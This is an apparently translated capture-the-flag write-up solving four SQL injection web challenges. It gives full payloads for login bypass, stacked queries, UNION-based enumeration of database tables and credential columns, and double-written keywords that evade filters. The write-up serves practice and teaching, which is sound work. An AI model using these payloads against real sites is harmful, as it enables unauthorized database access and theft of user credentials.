[Geek Challenge 2019] EasySQL
directory title
topic
answer
Just enter the username and password, admin and admin
Try to inject:
/check.php?username=admin&password=admin’
An error message appears, use the master key
/check.php?username=admin&password=admin’ or 1=1%23
or
According to the error message
/check.php?username=admin&password=admin’ or’ 1=1
The flag burst out, the flag of this question is:
flag{819d0c4e-cce7-4f46-9aad-fa85460da70d}
[SUCTF 2019]EasySQL
topic
answer
Target machine interface:
The input of 1 and other numbers can be echoed normally, but the input of 0 and letters cannot be echoed normally.
Capture packets to get data, this title is POST request, the data is in the request body
The input information is in the request body.
Test in the repeater and check the echo information. Can be tested multiple times
It is found that adding ', ", '), ") after the input information does not report an error, no echo or Nonono appears. By inputting a non-zero number, it can be echoed normally, but 0 and letters cannot be echoed normally, and nothing is displayed.
It is guessed that individual sql statements may be filtered
The semicolon can query data normally:
query=1;
It is speculated that there may be stack injection
show view database
query=1;show databases;
Check out the datasheet:
query=1;show tables;
Found the Flag data table, which may contain the information we want, try to get:
query=1;show columns from Flag;
show columns from is used to query the column names in the table
Nonono appears, guessing that the backend may have filtered the Flag
Just now we input a non-zero number to be echoed normally, but 0 and letters cannot be echoed normally. Guessing that there may be a || operator in the sql statement, only when a non-zero number is input, will return true, and the echo condition will be returned.
Guess the sql statement may be select input||flag from Flag
Construct payload: *, 1
query=*,1
||Short-circuit operation, the front is true, and the back is short-circuited. Return true, echo.
Equivalent to select *, 1 from Flag
The meanings of all columns in select * and select are basically the same , and the difference between them is almost negligible. So when querying all fields (or most fields), you can use select * to operate
Solution two:
payload:
query=1;set sql_mode=PIPES_AS_CONCAT;select 1
Among them, the function of set sql_mode=PIPES_AS_CONCAT is to change the role of || from or to a spliced string, and PIPES_AS_CONCAT makes || play the role of a connector.
The echo is successful, and the flag is found
In summary, the flag of this question is:
flag{c10b7151-b3b6-412b-8b0b-020f2600fcb0}
[Geek Challenge 2019] LoveSQL
topic
answer
Get the target machine, observe the interface, there is a login indicating that there may be SQL injection, and you can also know that there is SQL injection according to the title
You can observe the source code information of the web page and find that there is check.php. When guessing that it may be the login interface, enter the account and password to jump the interface and prompt information.
Go back to the target machine interface and try to log in: admin and admin
Tool: hackbar
It prompts that the user name or password is wrong, and then we inject to see if an error is reported:
/check.php?username=admin&password=admin’
If an error message appears, you can try to use the updatexml() function to report an error injection.
However, updatexml limits the character length to 32, and the longest is 32 characters. If it exceeds 32 characters, it will not explode.
We inject normally using union query:
Use the master key to see if the information can be released, and the normal echo will be displayed:
/check.php?username=admin&password=admin’ or 1=1%23
or
/check.php?username=admin&password=admin’ or’ 1=1–+
Echo normally, use this information to log in, and find that this interface is still there, continue to inject, and judge the number of fields:
/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91’ order by 4%23
An error message appears, replace 4 with 3
/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91’ order by 3%23
Normal echo, indicating that there are 3 columns of fields
Judgment echo point, joint query:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,2,3%23
Explode the current database version information and the current database:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),database()%23
Burst data table:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database()%23
Guess that the flag may be in the second table, try to report the information of the second data table:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’%23
Find sensitive information in the data packet and continue to blast
Expose the sensitive information of the data table, username and password:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,2,group_concat(username,password) from l0ve1ysq1%23
The echo is successful and the flag is obtained:
Swipe to the far right to see the flag
In summary
The flag of this question is flag{e45a955a-75e2-4f27-abb7-8f9ad51b020d}
It is guessed that the flag data may also exist in other libraries, and all the database information will be revealed:
/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(schema_name) from information_schema.schemata%23
The rest of the query operations are basically the same as the above operations, you can guess and try to query to get the flag information.
If you can't find it, just switch to another database or table.
BUUCTF [Geek Challenge 2019] BabySQL
topic
answer
According to the title and interface, we know that this is a SQL injection question
View the source code of the web page
Found check.php, found after clicking
From the above information, it can be known that check.php is the login interface for jumping, and after entering the user and password, the login jumps.
Login with admin and admin:
The user password is abnormal.
start test injection
Open the hackbar to get the current url
Test closure mode, add 'error
Using the master key:
According to the error message, we guess that the or may be filtered, add an s after the or, ors to verify:
The test confirmed that the or was filtered out!
We can use double writing to bypass the attempt:
Successfully echoed, and burst out the username and password, we will replace the username and password
After execution, it is still this interface
Next, let's judge the number of fields:
There is or in order, so double writing is bypassed.
At the same time, the test found that by is also filtered, so we continue to double write to bypass
/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323' oorrder bbyy 4–+
An error was reported, replace 4 with 3, and try again:
/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323' oorrder bbyy 3–+
Normal echo, indicating that there are 3 columns of fields
Judgment echo point:
Report an error again. According to the error message, we guess that there may still be filtering. Add a letter (arbitrary) after union and select respectively, and test and verify:
It means that union and select are also filtered, so we still double write to bypass
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,3–+
echo point:
Blast the current database and database version:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,version(),database()–+
Explode the data tables in the database:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
Through the above process, it is not difficult to find that there is still filtering at this time, from and where are also filtered, and double writing is bypassed in the same way
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()–+
Normal echo.
Through observation and guessing, explode the table data (column information) of b4bsql:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'–+
Get sensitive information, we directly explode the data:
/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(username,passwoorrd) frfromom b4bsql–+
The echo is successful, and the flag information can be observed when scrolling to the innermost part:
flag string:
In summary, the flag of this question is:
flag{8e9c11c7-b6c7-4ac7-99ab-5556af55ef3b}
We guess that there may also be flags in other tables, and all databases will be exposed:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata–+
Found that there is a ctf database, guessed that there is flag information in ctf, and revealed the table information in the ctf database:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'–+
Found the data packet of Flag, and continued to explode the information:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=‘Flag’–+
Get flag information:
/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag–+
Successful echo, get success:
The flag is:
flag{8fc708e5-7f33-4696-88ea-70b6f30c68ce}
If the article is inappropriate, criticism and correction are welcome!